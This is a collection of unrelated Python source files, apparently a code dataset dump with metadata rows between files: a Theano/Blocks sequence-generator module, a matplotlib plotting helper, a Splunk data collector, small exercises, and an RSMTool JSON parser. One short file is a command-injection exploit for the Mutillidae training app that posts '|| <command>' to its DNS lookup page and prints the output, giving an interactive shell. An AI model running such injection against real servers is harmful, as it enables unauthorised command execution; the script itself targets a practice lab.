the computational graph with name ``per_sequence_element``.
"""
# Compute the sum of costs
costs = self.cost_matrix(outputs, mask=mask, **kwargs)
cost = tensor.mean(costs.sum(axis=0))
add_role(cost, COST)
# Add auxiliary variable for per sequence element cost
application_call.add_auxiliary_variable(
(costs.sum() / mask.sum()) if mask is not None else costs.mean(),
name='per_sequence_element')
return cost
@application
def cost_matrix(self, application_call, outputs, mask=None, **kwargs):
"""Returns generation costs for output sequences.
See Also
--------
:meth:`cost` : Scalar cost.
"""
# We assume the data has axes (time, batch, features, ...)
batch_size = outputs.shape[1]
# Prepare input for the iterative part
states = dict_subset(kwargs, self._state_names, must_have=False)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
feedback = self.readout.feedback(outputs)
inputs = self.fork.apply(feedback, as_dict=True)
# Run the recurrent network
results = self.transition.apply(
mask=mask, return_initial_states=True, as_dict=True,
**dict_union(inputs, states, contexts))
# Separate the deliverables. The last states are discarded: they
# are not used to predict any output symbol. The initial glimpses
# are discarded because they are not used for prediction.
# Remember, glimpses are computed _before_ output stage, states are
# computed after.
states = {name: results[name][:-1] for name in self._state_names}
glimpses = {name: results[name][1:] for name in self._glimpse_names}
# Compute the cost
feedback = tensor.roll(feedback, 1, 0)
feedback = tensor.set_subtensor(
feedback[0],
self.readout.feedback(self.readout.initial_outputs(batch_size)))
readouts = self.readout.readout(
feedback=feedback, **dict_union(states, glimpses, contexts))
costs = self.readout.cost(readouts, outputs)
if mask is not None:
costs *= mask
for name, variable in list(glimpses.items()) + list(states.items()):
application_call.add_auxiliary_variable(
variable.copy(), name=name)
# This variables can be used to initialize the initial states of the
# next batch using the last states of the current batch.
for name in self._state_names + self._glimpse_names:
application_call.add_auxiliary_variable(
results[name][-1].copy(), name=name+"_final_value")
return costs
@recurrent
def generate(self, outputs, **kwargs):
"""A sequence generation step.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The outputs from the previous step.
Notes
-----
The contexts, previous states and glimpses are expected as keyword
arguments.
"""
states = dict_subset(kwargs, self._state_names)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
glimpses = dict_subset(kwargs, self._glimpse_names)
next_glimpses = self.transition.take_glimpses(
as_dict=True, **dict_union(states, glimpses, contexts))
next_readouts = self.readout.readout(
feedback=self.readout.feedback(outputs),
**dict_union(states, next_glimpses, contexts))
next_outputs = self.readout.emit(next_readouts)
next_costs = self.readout.cost(next_readouts, next_outputs)
next_feedback = self.readout.feedback(next_outputs)
next_inputs = (self.fork.apply(next_feedback, as_dict=True)
if self.fork else {'feedback': next_feedback})
next_states = self.transition.compute_states(
as_list=True,
**dict_union(next_inputs, states, next_glimpses, contexts))
return (next_states + [next_outputs] +
list(next_glimpses.values()) + [next_costs])
@generate.delegate
def generate_delegate(self):
return self.transition.apply
@generate.property('states')
def generate_states(self):
return self._state_names + ['outputs'] + self._glimpse_names
@generate.property('outputs')
def generate_outputs(self):
return (self._state_names + ['outputs'] +
self._glimpse_names + ['costs'])
def get_dim(self, name):
if name in (self._state_names + self._context_names +
self._glimpse_names):
return self.transition.get_dim(name)
elif name == 'outputs':
return self.readout.get_dim(name)
return super(BaseSequenceGenerator, self).get_dim(name)
@application
def initial_states(self, batch_size, *args, **kwargs):
# TODO: support dict of outputs for application methods
# to simplify this code.
state_dict = dict(
self.transition.initial_states(
batch_size, as_dict=True, *args, **kwargs),
outputs=self.readout.initial_outputs(batch_size))
return [state_dict[state_name]
for state_name in self.generate.states]
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.generate.states
@add_metaclass(ABCMeta)
class AbstractReadout(Initializable):
"""The interface for the readout component of a sequence generator.
The readout component of a sequence generator is a bridge between
the core recurrent network and the output sequence.
Parameters
----------
source_names : list
A list of the source names (outputs) that are needed for the
readout part e.g. ``['states']`` or
``['states', 'weighted_averages']`` or ``['states', 'feedback']``.
readout_dim : int
The dimension of the readout.
Attributes
----------
source_names : list
readout_dim : int
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`Readout` : the typically used readout brick
"""
@lazy(allocation=['source_names', 'readout_dim'])
def __init__(self, source_names, readout_dim, **kwargs):
self.source_names = source_names
self.readout_dim = readout_dim
super(AbstractReadout, self).__init__(**kwargs)
@abstractmethod
def emit(self, readouts):
"""Produce outputs from readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method of
a `(batch_size, readout_dim)` shape.
"""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Compute generation cost of outputs given readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method
of a `(..., readout dim)` shape.
outputs : :class:`~theano.Variable`
Outputs whose cost should be computed. Should have as many
or one less dimensions compared to `readout`. If readout has
`n` dimensions, first `n - 1` dimensions of `outputs` should
match with those of `readouts`.
"""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Compute initial outputs for the generator's first step.
In the notation from the :class:`BaseSequenceGenerator`
documentation this method should compute :math:`y_0`.
"""
pass
@abstractmethod
def readout(self, **kwargs):
r"""Compute the readout vector from states, glimpses, etc.
Parameters
----------
\*\*kwargs: dict
Contains sequence generator states, glimpses,
contexts and feedback from the previous outputs.
"""
pass
@abstractmethod
def feedback(self, outputs):
"""Feeds outputs back to be used as inputs of the transition."""
pass
class Readout(AbstractReadout):
r"""Readout brick with separated emitter and feedback parts.
:class:`Readout` combines a few bits and pieces into an object
that can be used as the readout component in
:class:`BaseSequenceGenerator`. This includes an emitter brick,
to which :meth:`emit`, :meth:`cost` and :meth:`initial_outputs`
calls are delegated, a feedback brick to which :meth:`feedback`
functionality is delegated, and a pipeline to actually compute
readouts from all the sources (see the `source_names` attribute
of :class:`AbstractReadout`).
The readout computation pipeline is constructed from `merge` and
    `post_merge` brick, whose responsibilities are described in the
respective docstrings.
Parameters
----------
emitter : an instance of :class:`AbstractEmitter`
The emitter component.
feedback_brick : an instance of :class:`AbstractFeedback`
The feedback component.
merge : :class:`~.bricks.Brick`, optional
A brick that takes the sources given in `source_names` as an input
and combines them into a single output. If given, `merge_prototype`
cannot be given.
merge_prototype : :class:`.FeedForward`, optional
If `merge` isn't given, the transformation given by
`merge_prototype` is applied to each input before being summed. By
default a :class:`.Linear` transformation without biases is used.
If given, `merge` cannot be given.
post_merge : :class:`.Feedforward`, optional
This transformation is applied to the merged inputs. By default
:class:`.Bias` is used.
merged_dim : int, optional
The input dimension of `post_merge` i.e. the output dimension of
        `merge` (or `merge_prototype`). If not given, it is assumed to be
the same as `readout_dim` (i.e. `post_merge` is assumed to not
change dimensions).
\*\*kwargs : dict
Passed to the parent's constructor.
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`AbstractEmitter`, :class:`AbstractFeedback`
"""
def __init__(self, emitter=None, feedback_brick=None,
merge=None, merge_prototype=None,
post_merge=None, merged_dim=None, **kwargs):
if not emitter:
emitter = TrivialEmitter(kwargs['readout_dim'])
if not feedback_brick:
feedback_brick = TrivialFeedback(kwargs['readout_dim'])
if not merge:
merge = Merge(input_names=kwargs['source_names'],
prototype=merge_prototype)
if not post_merge:
post_merge = Bias(dim=kwargs['readout_dim'])
if not merged_dim:
merged_dim = kwargs['readout_dim']
self.emitter = emitter
self.feedback_brick = feedback_brick
self.merge = merge
self.post_merge = post_merge
self.merged_dim = merged_dim
children = [self.emitter, self.feedback_brick, self.merge,
self.post_merge]
kwargs.setdefault('children', []).extend(children)
super(Readout, self).__init__(**kwargs)
def _push_allocation_config(self):
self.emitter.readout_dim = self.get_dim('readouts')
self.feedback_brick.output_dim = self.get_dim('outputs')
self.merge.input_names = self.source_names
self.merge.input_dims = self.source_dims
self.merge.output_dim = self.merged_dim
self.post_merge.input_dim = self.merged_dim
self.post_merge.output_dim = self.readout_dim
@application
def readout(self, **kwargs):
merged = self.merge.apply(**{name: kwargs[name]
for name in self.merge.input_names})
merged = self.post_merge.apply(merged)
return merged
@application
def emit(self, readouts):
return self.emitter.emit(readouts)
@application
def cost(self, readouts, outputs):
return self.emitter.cost(readouts, outputs)
@application
def initial_outputs(self, batch_size):
return self.emitter.initial_outputs(batch_size)
@application(outputs=['feedback'])
def feedback(self, outputs):
return self.feedback_brick.feedback(outputs)
def get_dim(self, name):
if name == 'outputs':
return self.emitter.get_dim(name)
elif name == 'feedback':
return self.feedback_brick.get_dim(name)
elif name == 'readouts':
return self.readout_dim
return super(Readout, self).get_dim(name)
@add_metaclass(ABCMeta)
class AbstractEmitter(Brick):
"""The interface for the emitter component of a readout.
Attributes
----------
readout_dim : int
The dimension of the readout. Is given by the
:class:`Readout` brick when allocation configuration
is pushed.
See Also
--------
:class:`Readout`
:class:`SoftmaxEmitter` : for integer outputs
Notes
-----
An important detail about the emitter cost is that it will be
evaluated with inputs of different dimensions so it has to be
flexible enough to handle this. The two ways in which it can be
applied are:
1. In :meth:BaseSequenceGenerator.cost_matrix where it will
be applied to the whole sequence at once.
2. In :meth:BaseSequenceGenerator.generate where it will be
applied to only one step of the sequence.
"""
@abstractmethod
def emit(self, readouts):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Implements the respective method of :class:`Readout`."""
pass
@add_metaclass(ABCMeta)
class AbstractFeedback(Brick):
"""The interface for the feedback component of a readout.
See Also
--------
:class:`Readout`
:class:`LookupFeedback` for integer outputs
"""
@abstractmethod
def feedback(self, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
class TrivialEmitter(AbstractEmitter):
"""An emitter for the trivial case when readouts are outputs.
Parameters
----------
readout_dim : int
The dimension of the readout.
Notes
-----
    By default :meth:`cost` always returns a zero tensor.
"""
@lazy(allocation=['readout_dim'])
def __init__(self, readout_dim, **kwargs):
super(TrivialEmitter, self).__init__(**kwargs)
self.readout_dim = readout_dim
@application
def emit(self, readouts):
return readouts
@application
def cost(self, readouts, outputs):
return tensor.zeros_like(outputs)
@application
def initial_outputs(self, batch_size):
return tensor.zeros((batch_size, self.readout_dim))
def get_dim(self, name):
if name == 'outputs':
return self.readout_dim
return super(TrivialEmitter, self).get_dim(name)
class SoftmaxEmitter(AbstractEmitter, Initializable, Random):
"""A softmax emitter for the case of integer outputs.
Interprets readout elements as energies corresponding to their indices.
Parameters
----------
initial_output : int or a scalar :class:`~theano.Variable`
The initial output.
"""
def __init__(self, initial_output=0, **kwargs):
self.initial_output = initial_output
self.softmax = NDimensionalSoftmax()
children = [self.softmax]
kwargs.setdefault('children', []).extend(children)
super(SoftmaxEmitter, self).__init__(**kwargs)
@application
def probs(self, readouts):
return self.softmax.apply(readouts, extra_ndim=readouts.ndim - 2)
@application
def emit(self, readouts):
probs = self.probs(readouts)
batch_size = probs.shape[0]
pvals_flat = probs.reshape((batch_size, -1))
generated = self.theano_rng.multinomial(pvals=pvals_flat)
return generated.reshape(probs.shape).argmax(axis=-1)
@application
def cost(self, readouts, outputs):
# WARNING: unfortunately this application method works
# just fine when `readouts` and `outputs` have
# different dimensions. Be careful!
return self.softmax.categorical_cross_entropy(
outputs, readouts, extra_ndim=readouts.ndim - 2)
@application
def initial_outputs(self, batch_size):
return self.initial_output * tensor.ones((batch_size,), dtype='int64')
def get_dim(self, name):
if name == 'outputs':
return 0
return super(SoftmaxEmitter, self).get_dim(name)
class TrivialFeedback(AbstractFeedback):
"""A feedback brick for the case when readout are outputs."""
@lazy(allocation=['output_dim'])
def __init__(self, output_dim, **kwargs):
super(TrivialFeedback, self).__init__(**kwargs)
self.output_dim = output_dim
@application(outputs=['feedback'])
def feedback(self, outputs):
return outputs
def get_dim(self, name):
if name == 'feedback':
return self.output_dim
return super(TrivialFeedback, self).get_dim(name)
class LookupFeedback(AbstractFeedback, Initializable):
"""A feedback brick for the case when readout are integers.
Stores and retrieves distributed representations of integers.
"""
def __init__(self, num_outputs=None, feedback_dim=None, **kwargs):
self.num_outputs = num_outputs
self.feedback_dim = feedback_dim
self.lookup = LookupTable(num_outputs, feedback_dim)
children = [self.lookup]
kwargs.setdefault('children', []).extend(children)
super(LookupFeedback, self).__init__(**kwargs)
def _push_allocation_config(self):
self.lookup.length = self.num_outputs
self.lookup.dim = self.feedback_dim
@application
def feedback(self, outputs):
assert self.output_dim == 0
return self.lookup.apply(outputs)
def get_dim(self, name):
if name == 'feedback':
return self.feedback_dim
return super(LookupFeedback, self).get_dim(name)
class FakeAttentionRecurrent(AbstractAttentionRecurrent, Initializable):
"""Adds fake attention interface to a transition.
:class:`BaseSequenceGenerator` requires its transition brick to support
:class:`~blocks.bricks.attention.AbstractAttentionRecurrent` interface,
that is to have an embedded attention mechanism. For the cases when no
attention is required (e.g. language modeling or encoder-decoder
models), :class:`FakeAttentionRecurrent` is used to wrap a usual
recurrent brick. The resulting brick has no glimpses and simply
passes all states and contexts to the wrapped one.
.. todo::
Get rid of this brick and support attention-less transitions
in :class:`BaseSequenceGenerator`.
"""
def __init__(self, transition, **kwargs):
self.transition = transition
self.state_names = transition.apply.states
self.context_names = transition.apply.contexts
self.glimpse_names = []
children = [self.transition]
kwargs.setdefault('children', []).extend(children)
super(FakeAttentionRecurrent, self).__init__(**kwargs)
@application
def apply(self, *args, **kwargs):
return self.transition.apply(*args, **kwargs)
@apply.delegate
def apply_delegate(self):
return self.transition.apply
@application
def compute_states(self, *args, **kwargs):
return self.transition.apply(iterate=False, *args, **kwargs)
@compute_states.delegate
def compute_states_delegate(self):
return self.transition.apply
@application(outputs=[])
def take_glimpses(self, *args, **kwargs):
return None
@application
def initial_states(self, batch_size, *args, **kwargs):
return self.transition.initial_states(batch_size,
*args, **kwargs)
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.transition.apply.states
def get_dim(self, name):
return self.transition.get_dim(name)
class SequenceGenerator(BaseSequenceGenerator):
r"""A more user-friendly interface for :class:`BaseSequenceGenerator`.
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component for the sequence generator.
transition : instance of :class:`.BaseRecurrent`
The recurrent transition to be used in the sequence generator.
Will be combined with `attention`, if that one is given.
attention : object, optional
The attention mechanism to be added to ``transition``,
an instance of
:class:`~blocks.bricks.attention.AbstractAttention`.
add_contexts : bool
If ``True``, the
:class:`.AttentionRecurrent` wrapping the
`transition` will add additional contexts for the attended and its
mask.
\*\*kwargs : dict
All keywords arguments are passed to the base class. If `fork`
keyword argument is not provided, :class:`.Fork` is created
that forks all transition sequential inputs without a "mask"
substring in them.
"""
def __init__(self, readout, transition, attention=None,
add_contexts=True, **kwargs):
normal_inputs = [name for name in transition.apply.sequences
if 'mask' not in name]
kwargs.setdefault('fork', Fork(normal_inputs))
if attention:
transition = AttentionRecurrent(
transition, attention,
add_contexts=add_contexts, name="att_trans")
else:
transition = FakeAttentionRecurrent(transition,
name="with_fake_attention")
super(SequenceGenerator, self).__init__(
readout, transition, **kwargs)
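# Usage sketch (not part of this module): a typical attention-less generator wraps a
# Readout with a SoftmaxEmitter and LookupFeedback around a recurrent transition.
# All dimensions and initializers below are placeholders.
#
#   from blocks.bricks import Tanh
#   from blocks.bricks.recurrent import SimpleRecurrent
#   from blocks.initialization import IsotropicGaussian, Constant
#
#   generator = SequenceGenerator(
#       Readout(readout_dim=alphabet_size, source_names=["states"],
#               emitter=SoftmaxEmitter(name="emitter"),
#               feedback_brick=LookupFeedback(alphabet_size, feedback_dim),
#               name="readout"),
#       SimpleRecurrent(dim=state_dim, activation=Tanh(), name="transition"),
#       weights_init=IsotropicGaussian(0.01), biases_init=Constant(0))
#   generator.initialize()
#   cost = generator.cost(outputs, mask=outputs_mask)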
| 35.357388
| 78
| 0.655846
| 28,858
| 0.934914
| 0
| 0
| 14,598
| 0.472932
| 0
| 0
| 15,848
| 0.513429
|
3bad4e23a3beb6bf9c00280bce54c9d434b3e821
| 1,752
|
py
|
Python
|
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
def plotComponents2D(X, y, labels, use_markers = False, ax=None, legends = None, tags = None):
if X.shape[1] < 2:
print('ERROR: X MUST HAVE AT LEAST 2 FEATURES/COLUMNS! SKIPPING plotComponents2D().')
return
# Gray shades can be given as a string encoding a float in the 0-1 range
colors = ['0.9', '0.1', 'red', 'blue', 'black','orange','green','cyan','purple','gray']
markers = ['o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H']
if (ax is None):
fig, ax = plt.subplots()
i=0
if (labels is None):
labels = set(y)
for label in labels:
cluster = X[np.where(y == label)]
# print(cluster.shape)
if use_markers:
ax.scatter([cluster[:,0]], [cluster[:,1]],
s=40,
marker=markers[i],
facecolors='none',
edgecolors=colors[i+3],
label= (str(legends[i]) if legends is not None else ("Y = " + str(label))) )
else:
ax.scatter([cluster[:,0]], [cluster[:,1]],
s=70,
facecolors=colors[i],
label= (str(legends[i]) if legends is not None else ("Y = " + str(label))),
edgecolors = 'black',
alpha = .4) # cmap='tab20'
i=i+1
if (tags is not None):
for j,tag in enumerate(tags):
ax.annotate(str(tag), (X[j,0] + 0.1, X[j,1] - 0.1))
ax.legend()
ax.axes.xaxis.set_visible(False)
ax.axes.yaxis.set_visible(False)
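# Usage sketch (synthetic data for illustration):
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_demo = np.vstack([rng.normal(0, 1, (30, 2)), rng.normal(4, 1, (30, 2))])
    y_demo = np.array([0] * 30 + [1] * 30)
    plotComponents2D(X_demo, y_demo, labels=None, use_markers=True)
    plt.show()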
| 36.5
| 114
| 0.4629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 350
| 0.199772
|
3bafd74c087e7fcccb34aa701eb50c300c1ce2a1
| 5,541
|
py
|
Python
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 2
|
2020-08-17T07:52:48.000Z
|
2020-12-18T16:39:32.000Z
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 5
|
2020-12-15T23:40:14.000Z
|
2022-02-23T15:43:18.000Z
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 4
|
2019-05-16T09:57:33.000Z
|
2021-07-14T12:31:21.000Z
|
#!/usr/bin/python
from __future__ import absolute_import
from builtins import object
import threading
import time
from collections import namedtuple
from . import ta_consts as c
from ..common import log as stulog
from ...splunktalib.common import util as scu
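# XML templates used to wrap collected data as Splunk modular-input stream
# events; `unbroken_evt_fmt` additionally carries the unbroken/done markers.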
evt_fmt = ("<stream><event><host>{0}</host>"
"<source><![CDATA[{1}]]></source>"
"<sourcetype><![CDATA[{2}]]></sourcetype>"
"<time>{3}</time>"
"<index>{4}</index><data>"
"<![CDATA[{5}]]></data></event></stream>")
unbroken_evt_fmt = ("<stream>"
"<event unbroken=\"1\">"
"<host>{0}</host>"
"<source><![CDATA[{1}]]></source>"
"<sourcetype><![CDATA[{2}]]></sourcetype>"
"<time>{3}</time>"
"<index>{4}</index>"
"<data><![CDATA[{5}]]></data>"
"{6}"
"</event>"
"</stream>")
event_tuple = namedtuple('Event',
['host', 'source', 'sourcetype', 'time', 'index',
'raw_data', 'is_unbroken', 'is_done'])
class TADataCollector(object):
def __init__(self, tconfig, meta_config, task_config,
checkpoint_manager_cls, data_client_cls, data_loader):
self._lock = threading.Lock()
self._ta_config = tconfig
self._meta_config = meta_config
self._task_config = task_config
self._stopped = False
self._p = self._get_logger_prefix()
self._checkpoint_manager = checkpoint_manager_cls(meta_config,
task_config)
self.data_client_cls = data_client_cls
self._data_loader = data_loader
self._client = None
def get_meta_configs(self):
return self._meta_config
def get_task_config(self):
return self._task_config
def get_interval(self):
return self._task_config[c.interval]
def _get_logger_prefix(self):
pairs = ['{}="{}"'.format(c.stanza_name, self._task_config[
c.stanza_name])]
return "[{}]".format(" ".join(pairs))
def stop(self):
self._stopped = True
if self._client:
self._client.stop()
def __call__(self):
self.index_data()
def _build_event(self, events):
if not events:
return None
if not isinstance(events, list):
events = [events]
evts = []
for event in events:
assert event.raw_data, "the raw data of events is empty"
if event.is_unbroken:
evt = unbroken_evt_fmt.format(
event.host or "", event.source or "", event.sourcetype or
"", event.time or "", event.index or "",
scu.escape_cdata(event.raw_data), "<done/>" if
event.is_done else "")
else:
evt = evt_fmt.format(event.host or "", event.source or "",
event.sourcetype or "", event.time or "",
event.index or "",
scu.escape_cdata(event.raw_data))
evts.append(evt)
return evts
def _create_data_client(self):
return self.data_client_cls(self._meta_config,
self._task_config,
self._checkpoint_manager,
self._data_loader.get_event_writer())
def index_data(self):
if self._lock.locked():
stulog.logger.debug(
"Last round of stanza={} is not done yet".format(
self._task_config[c.stanza_name]))
return
with self._lock:
try:
self._do_safe_index()
self._checkpoint_manager.close()
except Exception:
stulog.logger.exception("{} Failed to index data"
.format(self._p))
stulog.logger.info("{} End of indexing data".format(self._p))
if not self._ta_config.is_single_instance():
self._data_loader.tear_down()
def _write_events(self, events):
evts = self._build_event(events)
if evts:
if not self._data_loader.write_events(evts):
stulog.logger.info("{} the event queue is closed and the "
"received data will be discarded".format(
self._p))
return False
return True
def _do_safe_index(self):
self._client = self._create_data_client()
while not self._stopped:
try:
events = self._client.get()
if not events:
continue
else:
if not self._write_events(events):
break
except StopIteration:
stulog.logger.info("{} Finished this round".format(self._p))
return
except Exception:
stulog.logger.exception("{} Failed to get msg".format(self._p))
break
# in case encounter exception or fail to write events
if not self._stopped:
self.stop()
| 37.693878
| 80
| 0.497203
| 4,344
| 0.783974
| 0
| 0
| 0
| 0
| 0
| 0
| 857
| 0.154665
|
3bb2017aa37b51490a6ff0089cf9d21b31b7addf
| 220
|
py
|
Python
|
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
class Circle:
def __init__(self, radius):
self.radius = radius
def compute_area(self):
return self.radius ** 2 * 3.14
circle = Circle(2)
print("Area of circuit: " + str(circle.compute_area()))
| 20
| 55
| 0.631818
| 142
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.086364
|
3bb360a4392cf829c811ffb8e087e7288ebd8630
| 502
|
py
|
Python
|
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
class Solution:
def addStrings(self, num1: str, num2: str) -> str:
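        # Grade-school addition: walk both strings from the rightmost digit,
        # accumulate digit sums plus carry, then reverse the collected digits.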
i, j, result, carry = len(num1) - 1, len(num2) - 1, '', 0
while i >= 0 or j >= 0:
if i >= 0:
carry += ord(num1[i]) - ord('0')
if j >= 0:
carry += ord(num2[j]) - ord('0')
result += chr(carry % 10 + ord('0'))
carry //= 10
i -= 1
j -= 1
if carry == 1:
result += '1'
return result[::-1]
| 31.375
| 65
| 0.376494
| 501
| 0.998008
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.027888
|
3bb3f6ef40737ea90a9f45f3effca880da0d4227
| 154
|
py
|
Python
|
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
import pandas as pd
from my_mod import enlarge
print("Hello!")
df = pd.DataFrame({"a":[1,2,3], "b":[4,5,6]})
print(df.head())
x = 11
print(enlarge(x))
| 14
| 45
| 0.62987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.090909
|
3bb55e28e639f9add169bf9d74da89f4b5663f84
| 885
|
py
|
Python
|
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from requests import session
from bs4 import BeautifulSoup
# Put the IP address of your target machine here.
host = "192.168.1.167"
# Path to the dns-lookup.php page.
route = "/mutillidae/index.php?page=dns-lookup.php"
with session() as s:
cmd = ''
while cmd != 'exit':
cmd = input(">>")
payload = "|| {}".format(cmd)
        # Send the payload to the host via a POST request.
response = s.post("http://{}{}".format(host, route), data={"target_host": payload})
        # Parse the response with Beautiful Soup.
soup = BeautifulSoup(response.text, "html.parser")
        # The command output is inside a <pre> tag with the class 'report-header',
        # so we tell Beautiful Soup to find it and give us its text.
command_output = soup.find_all("pre", attrs={"class": "report-header"})[0].get_text()
        # Print the command output.
print(command_output)
| 32.777778
| 87
| 0.692655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.580791
|
3bb5cf6df03cde1b36d438f6ec362fdce3a55254
| 101
|
py
|
Python
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
# sys.stdin.readline()
import sys
input = sys.stdin.readline
print(input().replace('2017', '2018'))
| 16.833333
| 38
| 0.70297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.336634
|
3bb6a612c41a6fc405f13a76e25386f09fd4787a
| 4,069
|
py
|
Python
|
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
"""
Utility classes and functions for RSMTool file management.
:author: Jeremy Biggs (jbiggs@ets.org)
:author: Anastassia Loukina (aloukina@ets.org)
:author: Nitin Madnani (nmadnani@ets.org)
:organization: ETS
"""
import json
import re
from glob import glob
from pathlib import Path
from os.path import join
from .constants import POSSIBLE_EXTENSIONS
def parse_json_with_comments(pathlike):
"""
Parse a JSON file after removing any comments.
Comments can use either ``//`` for single-line
    comments or ``/* ... */`` for multi-line comments.
The input filepath can be a string or ``pathlib.Path``.
Parameters
----------
    pathlike : str or os.PathLike
Path to the input JSON file either as a string
or as a ``pathlib.Path`` object.
Returns
-------
obj : dict
JSON object representing the input file.
Note
----
This code was adapted from:
https://web.archive.org/web/20150520154859/http://www.lifl.fr/~riquetd/parse-a-json-file-with-comments.html
"""
# Regular expression to identify comments
comment_re = re.compile(r'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE)
# if we passed in a string, convert it to a Path
if isinstance(pathlike, str):
pathlike = Path(pathlike)
with open(pathlike, 'r') as file_buff:
content = ''.join(file_buff.readlines())
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return JSON object
config = json.loads(content)
return config
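# Usage sketch (the file name "experiment.json" is hypothetical, not part of
# this module): parse a configuration file that may contain // or /* ... */
# comments and get back a plain dict.
#
#   config = parse_json_with_comments("experiment.json")
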